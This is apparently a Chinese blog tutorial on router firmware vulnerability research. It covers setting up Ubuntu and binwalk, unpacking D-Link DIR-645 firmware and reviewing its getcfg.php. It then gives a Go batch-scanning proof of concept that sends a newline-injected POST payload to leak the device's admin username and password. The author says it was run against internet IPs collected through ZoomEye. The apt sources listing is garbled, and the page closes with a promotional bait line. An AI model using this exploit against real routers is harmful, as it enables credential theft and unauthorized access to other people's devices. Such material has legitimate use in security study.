本篇文章以路由器固件相关漏洞来演示，从0到1分享经验。

本地虚拟机搭建ubuntu 16.04

ubuntu iso下载地址：http://mirrors.aliyun.com/ubuntu-releases/

安装完，给root用户新增个密码

sudo passwd root

切换到root用户

su root

修改阿里云镜像：

vi /etc/apt/sources.list

打开文件不要做任何操作，直接输入 ggdG 清空当前文件内容，注意 G 是大写

ggdG

然后粘贴以下内容

#deb cdrom:[Ubuntu 16.04 LTS Xenial Xerus - Release amd64 (20160420.1)]/ xenial main restricted deb-src

http://archive.ubuntu.com/ubuntu xenial main restricted #Added by

software-properties deb http://mirrors.aliyun.com/ubuntu/ xenial main

restricted deb-src http://mirrors.aliyun.com/ubuntu/ xenial main

restricted multiverse universe #Added by software-properties deb

http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted

deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates main

restricted multiverse universe #Added by software-properties deb

http://mirrors.aliyun.com/ubuntu/ xenial universe deb

http://mirrors.aliyun.com/ubuntu/ xenial-updates universe deb

http://mirrors.aliyun.com/ubuntu/ xenial multiverse deb

http://mirrors.aliyun.com/ubuntu/ xenial-updates multiverse deb

http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted

universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/

xenial-backports main restricted universe multiverse #Added by

software-properties deb http://archive.canonical.com/ubuntu xenial

partner deb-src http://archive.canonical.com/ubuntu xenial partner deb

http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted

deb-src http://mirrors.aliyun.com/ubuntu/ xenial-security main

restricted multiverse universe #Added by software-properties deb

http://mirrors.aliyun.com/ubuntu/ xenial-security universe deb

http://mirrors.aliyun.com/ubuntu/ xenial-security multiverse

更新镜像源(注意不同版本的镜像源是不一样的)

sudo apt-get update

安装python3.7

因为ubuntu 16.04带的python是3.5的，而 Binwalk 要求3.6以上。

sudo add-apt-repository ppa:deadsnakes/ppa sudo apt-get update sudo

apt-get install python3.7

修改apt指定的python3

sudo update-alternatives --install /usr/bin/python3 python3

/usr/bin/python3.5 1 sudo update-alternatives --install

/usr/bin/python3 python3 /usr/bin/python3.7 2

update-alternatives命令可以修改系统默认命令的软链指向，通过以下命令，可以切换Python3的指向

sudo update-alternatives --config python3

查看一下是否安装成功：

检测版本：

python3 -V

安装binwalk（也可翻到后文直接使用自动化工具《自动安装binwalk》）

git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo

./deps.sh sudo python3 setup.py install

安装unzip

apt install unzip

解压缩固件

unzip DLink_DIR645_A1_FW102B08.zip

如上图，可以看到成功解包

DIR-645信息泄露

比如，这里是DIR645的固件包，我们直接去看web目录下的 getcfg.php文件

HTTP/1.1 200 OK

Content-Type: text/xml

xml version="1.0" encoding="utf-8"";?>

if ($_POST["CACHE"] == "true")

{

echo dump(1, "/runtime/session/".$SESSION_UID."/postxml");

}

else

{

/* cut_count() will return 0 when no or only one token. */

$SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");

TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);

$SERVICE_INDEX = 0;

while ($SERVICE_INDEX < $SERVICE_COUNT)

{

$GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");

TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);

if ($GETCFG_SVC!="")

{

$file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";

/* GETCFG_SVC will be passed to the child process. */

if (isfile($file)=="1") dophp("load", $file);

}

$SERVICE_INDEX++;

}

}

?>

查看源码我们能看到/htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml.php存在用户名及密码的泄漏

批量检测脚本

直接撸一个poc

package main

import (

"bufio"

"crypto/tls"

"flag"

"fmt"

"github.com/fatih/color"

"io"

"io/ioutil"

"net/http"

"os"

"strings"

"sync"

)

func exec(targetURL string, isbatch bool) {

PostData := `SERVICES=DEVICE.ACCOUNT&attack=true%0aAUTHORIZED_GROUP=1`

/*构造payload*/

cli := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}

if !strings.Contains(targetURL, "http") {

targetURL = "http://" + targetURL

}

request, err := http.NewRequest(http.MethodPost, targetURL+"/getcfg.php", strings.NewReader(PostData))

if err != nil {

fmt.Println(err)

}

request.Header.Add("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0")

request.Header.Add("Connection", "close")

request.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")

request.Header.Add("Accept-Encoding", "gzip, deflate")

request.Header.Add("Upgrade-Insecure-Requests", "1")

request.Header.Add("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2")

/*http请求体构建并忽略tls证书校验*/

do, err := cli.Do(request)

if err != nil {

return

} /*发送数据包*/

defer func() {

_ = do.Body.Close()

}()

if do.StatusCode == 404 {

return

} else if do.StatusCode == 200 {

all, _ := ioutil.ReadAll(do.Body)

if isbatch {

if strings.Contains(string(all), "DEVICE.ACCOUNT") {

color.Blue(fmt.Sprintf("%s 存在漏洞\n", targetURL))

}

}

}

color.Red(fmt.Sprintf("%s 不存在漏洞\n", targetURL))

return

}

func main() {

var wg sync.WaitGroup

var targetURL, filepath string

flag.StringVar(&targetURL, "u", "", "")

flag.StringVar(&filepath, "l", "", "")

flag.CommandLine.Usage = func() { fmt.Println("使用说明：\n执行命令：./main -u http://127.0.0.1:8080 \n批量检测：./main -l url.txt ") }

flag.Parse()

if len(targetURL) == 0 {

file, err := os.OpenFile(filepath, os.O_RDWR, 0666)

if err != nil {

fmt.Println("Open file error!", err)

return

}

defer file.Close()

buf := bufio.NewReader(file)

for {

wg.Add(1)

line, err := buf.ReadString('\n')

line = strings.TrimSpace(line)

a := line

go func() {

exec(a, true)

wg.Done()

}()

if err != nil {

if err == io.EOF {

break

} else {

fmt.Println("Read file error!", err)

return

}

}

}

} else {

exec(targetURL, false)

}

wg.Wait()

}

使用zoomeye在互联网爬的IP，一个漏洞都没有，哈哈哈尴尬。

当然，毕竟是虚拟环境，很多情况下会遇到各种各样的问题，所以有条件的还是买真机来调试吧【想领取网络安全资料的朋友才能点】

路由器固件下的小试牛刀，与漏洞相关的经验分享

本地虚拟机搭建ubuntu 16.04

DIR-645信息泄露

批量检测脚本

你可能感兴趣的:(路由器固件下的小试牛刀，与漏洞相关的经验分享)